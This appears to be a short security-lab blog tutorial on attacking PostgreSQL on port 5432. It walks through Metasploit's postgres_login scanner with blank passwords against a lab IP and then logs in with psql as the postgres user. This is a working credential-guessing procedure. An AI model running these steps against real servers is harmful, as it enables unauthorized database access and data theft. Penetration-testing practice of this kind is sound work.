Attack PostgreSQL – This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Rapid 7

What is PostgreSQL?

PostgreSQL is a powerful, open source object-relational database system with over 30 years of active development that has earned it a strong reputation for reliability, feature robustness, and performance.

Port 5432 Vulnerabilities

Attacking PostgreSQL with Metasploit

use auxiliary/scanner/postgres/postgres_login

msf5 auxiliary(scanner/postgres/postgres_login) > show options

msf5 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS true

msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 172.16.74.129

Attack PostgreSQL Server

msf5 auxiliary(scanner/postgres/postgres_login) > exploit

Screenshot from 2019 11 16 22 09 16 1024x283 1

root@poplab:~# psql -h 172.16.74.129 -U postgres -W postgres

PostgreSQL Security

https://www.postgresql.org/

Ultimate Guide to Attack PostgreSQL Server Port 5432

What is PostgreSQL?

Port 5432 Vulnerabilities

Attacking PostgreSQL with Metasploit

Attack PostgreSQL Server

PostgreSQL Security

Leave a Reply Cancel reply

Add PopLabSec to your Homescreen!